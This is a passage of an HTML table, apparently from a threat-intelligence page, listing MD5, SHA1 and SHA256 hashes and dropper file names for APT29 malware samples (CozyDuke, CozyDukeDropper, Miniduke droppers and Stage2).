<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">F33C980D4B6AAAB1DC401226AB452CE840AD4F40</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7f6bca4f08c63e597bed969f5b729c56</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">65fa52f632e4e83ff83120c7df6b90291025a76d5daeb183e814ec0b3bd2bd4e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">F7693E5D39DB067D97CD91FB22522F94C59FDA3D</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">90674c3cca487fedbe77c4986d023296</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8cc0f8322ce5f546cdccac553420a8ff9784212c5aada89c04a8ec2c5324f983</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">F7D47C38ECA7EC68AA478C06B1BA983D9BF02E15</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a5d6ad8ad82c266fda96e076335a5080</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7ed2d1aceab5f54df4acca63b5d269842d49521e13bab5e652237667c7eef261</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2012-02_FSecure_Cozyduke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDukeDropper</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDukeDropper</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0E0182694C381F8B68AFC5F3FF4C4653</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0e0182694c381f8b68afc5f3ff4c4653</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c1b19af1e354f13c90163780be6ad50f02d5bf8bac1c9cc1eab1377a159de1be</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDukeDropper</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">181A88C911B10D0FCB4682AE552C0DE3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">181a88c911b10d0fcb4682ae552c0de3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a5373b33ac970dedeb52528b123959145bf51c95b159a30a7823ad8018ac4b41</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDukeDropper</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1DDE02FF744FA4E261168E2008FD613A</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1dde02ff744fa4e261168e2008fd613a</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">418a21d49fe5bca8a3e050f039a0e2aa03db6d2de0fb49e3ff9d987f31b22dda</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDukeDropper</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4121414C63079B7FA836BE00F8D0A93B</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4121414c63079b7fa836be00f8d0a93b</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">fde146d9d8c42d3b7803285bfa73976b81234f9ef37a16f9319929ec1e686bb3</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDukeDropper</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">43C012086C1AE0A67C38B0926D6CBA3F</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">43c012086c1ae0a67c38b0926d6cba3f</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3dea35172449f0b9a86dff9af3b4480cc4c37a30e8cb54963ff91c4c1ffe7b0d</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDukeDropper</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">91AAF47843A34A9D8D1BB715A6D4ACEC</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">91aaf47843a34a9d8d1bb715a6d4acec</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">dc70d3046b59785b2b9b7091e26f2484ba7a488dba420a8a05be388a337c399e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDukeDropper</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">95B3EC0A4E539EFAA1FAA3D4E25D51DE</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">95b3ec0a4e539efaa1faa3d4e25d51de</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDukeDropper</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9AD55B83F2EEC0C19873A770B0C86A2F</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9ad55b83f2eec0c19873a770b0c86a2f</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7cdb9c2e8b6ca7f0a683a39c0bdadc7a512cff5d8264fdec012c541fd19c0522</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDukeDropper</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9F65E3B320EC91380EBC28D4FDFF4895</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9f65e3b320ec91380ebc28d4fdff4895</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8a5d8d103cb175d7dc41932ef9a890997e25dbe15f94ecd2105835fe49779354</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDukeDropper</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">EB22B99D44223866E24872D80A4DDEFD</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">eb22b99d44223866e24872d80a4ddefd</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f722677df4fb7eb4ac986a944d4f6630b91ac22b31f8d39ec9bf941376d5d4db</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDukeDropper</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">F58A4369B8176EDBDE4396DC977C9008</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f58a4369b8176edbde4396dc977c9008</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">30c69d91247f8a72a69e4d7c4bce3eafba40975e5890c23dc4dbe7c9a11afa73</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDukeDropper</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">FEF254D6C46FDCED294DB44ACEF8D839</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">fef254d6c46fdced294db44acef8d839</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">da3ee90d5ae8b82775567bc35896f7752b5f9a1eb686feb2e32f376e8e936e7a</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2013-02_Crysys_Miniduke Indicators</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2013-02_Crysys_Miniduke Indicators</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Document_Droppers</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Document_Droppers</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2402C2DC6ACC5A8418201FEA5B2043F985E1DD69_EUAG_report.pdf_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">cf5a5239ada9b43592757c0d7bf66169</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5fbe3c1075e1afb6c1a3ce757bb8d401e1b1f61db42902cb72fd7b85e4e5f1a5</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Document_Droppers</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5951EEF7C336E442C95F247AB2ECC4895F5D3E45_report.pdf_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0cdf55626e56ffbf1b198beb4f6ed559</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">59b62e650a437032886e1cc74dd7cdf0abab5ee6bc85fb4aa18568733aa89370</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Document_Droppers</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ADCB57BCE7FBB5E076F3272990BEDEE1D9544EE5_EUAG_report.pdf__</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3f301758aa3d5d123a9ddbad1890853b</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8a844864e62650905fc438f6291fa64ae2d3822054cc8354c44a923d5364905e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Document_Droppers</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">DD2C3592281EC09602AAA8488EB2F4509F75EF81_The 2013 Armenian Economic Association.pdf_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c03bcb0cde62b3f45b4d772ab635e2b0</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">da7f82d0c80c7d95d787185c04ecc116062bc655e513eaf1ccb4a1423bdbd289</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Document_Droppers</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">FBC3856FD689E1AC0F8FB56BBD7D0A2B8332A928_ASEM_Seminar.pdf_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">88292d7181514fda5390292d73da28d4</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">784d1ebd1faccec27f98970cc266859eaf5676da1c451e3304fb55435d8c8473</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Document_Droppers</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">FC53525F4E2E5B8EBE86778C20FD8916612CFD29_action_plan.pdf_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3668b018b4bb080d1875aee346e3650a</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5b21100b828b77758bfd6495c924e71f8bbd890c78d07067928bd7beccae087e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2013-02_Crysys_Miniduke Indicators</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">109E1E387F8B2BB8D92F45E79881809384E9AE54</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d39f2202b421561cfc36a8802184685c</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e8d7b9fc80a87688fe6c6515117a6ebd96cfaea72a6bddb4bdc05404869f5f26</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1BA5BCD62ABCBFF517A4ADB2609F721DD7F609DF</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">48bbce47e4d2d51811ea99d5a771cd1a</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1f19bd932336fa721e739b32c07b67c01ea4bd0ebc70e92a70f41e51f4668a0a</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1E6B9414FCE4277207AAB2AA12E4F0842A23F9C1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a4ad6b55b1bc9e16123de1388f6ef9bf</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7889fbd40f65cfe21d0c7486b29eb4c5042abff4ac660c12c7936831445cfd6e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">223C7EB7B9DDE08EE028BBA6552409EE144DB54A</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a67ad3e2a020f690d892b727102a759b</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">35c08566dc38ad65e906b3683ace98e5beef855aeedc611a0317a72eee193539</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">28A43EAC3BE1B96C68A1E7463AE91367434A2AC4</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">297ef5bf99b5e4fd413f3755ba6aad79</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c60621e82f58b5ea5b36cde40889a076cb2c7f1612144998b1d388200bc7e295</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">296FD4C5B4BF8EA288F45B4801512D7DEC7C497B</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b8e89f9908262b5385623c0e39d6b940</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8e28dcf7fd7ce1ad9a65c186e09a7843ee31af924509148f085958cadfdda8fb</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2CEAE0F5F3EFE366EBDED0A413E5EA264FBF2A33</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">441ee6a307e672c24d334d66cd7b2e1a</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f4b01a3a299b09d2b4418cb66e80c34e3ec04016ed27199c472515cf95a023d0</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">30B377E7DC2418607D8CF5D01AE1F925EAB2F037</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2dcd049c591644e35102921a48799975</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">354786c5df71cd090c96d1328b4e31cd28b8ddc77904863d100b6c35ad235b69</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">31AB6830F4E39C2C520AE55D4C4BFFE0B347C947</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ffefe16d581340c1e49f585a576a1fd8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">764f8c8f8832954c99fb0c2ac5ac5d89506dc5dc50310c9112318b75e9f9e2bf</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">352A2CF4BB2C9E300CE9A51740F238C9282CA6E4</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7049aa581874752093bb98850ff45dac</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">889fffd6f073755742324757394a6cbca41f72562af846105b51007855149903</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">36B969C1B3C46953077E4AABB75BE8CC6AA6A327</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ab2d8a0d5b03d40f148f2f907b55f9f1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">55265193d63d56553e8e135e9a60d7d7c13cbf9d82ac25f84306ec98d74725b0</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">43FA0D5A30B4CD72BB7E156C00C1611BB4F4BD0A</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b100d530d67cfbe76394bb0160567382</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9c13a32033bc7dd06016651b0f21a2bed9be1dc40c6879f925c71e05f4f1c8f7</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4EC769C15A9E318D41FD4A1997EC13C029976FC2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">05d10323111f02233163a6742556c974</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">62a2df9d001d3e0f222d77b6781eb279761f1354570773ef1929a86557a11454</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">53140342B8FE2DD7661FCE0D0E88D909F55099DB</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e990e0d1ee90cd10c4be7bfde6cc3e5a</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">cc6ad212f50e0a7a708bb1b63a01d8932f471618cdda69b2e12106ae112b2415</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5551408323086F31D9BC3358AB5B2ED4DDE86C5D</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">fdc96d77af6fdae487002e32d61df123</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c150dc87a29f23f909498fc13107187416618cacdfe0ecdf6976bf2a2632e82e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5ACAEA49540635670036DC626503431B5A783B56</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c519eef57001ad3ae60cdcb0009bf778</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">acd886fa7b9117807f1e11f0f38b9fad1afce51aa9cfbe3810a39d883d0ca663</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">634A1649995309B9C7D163AF627F7E39F42D5968</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b8088f6594dd8cba31b4f52a2d91f40e</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5569b85532adb1e637f83c997910924345f10aa9c2948b3d26be13eec6cbeb8b</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">683104D28BD5C52C53D2E6C710A7BD19676C28B8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e1a659473ae1e828508309b77da13783</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">830ee990a6d4aaf00bb051704c93b468792561e8dd6a6ed4662f6032d38dd37a</span></td></tr>
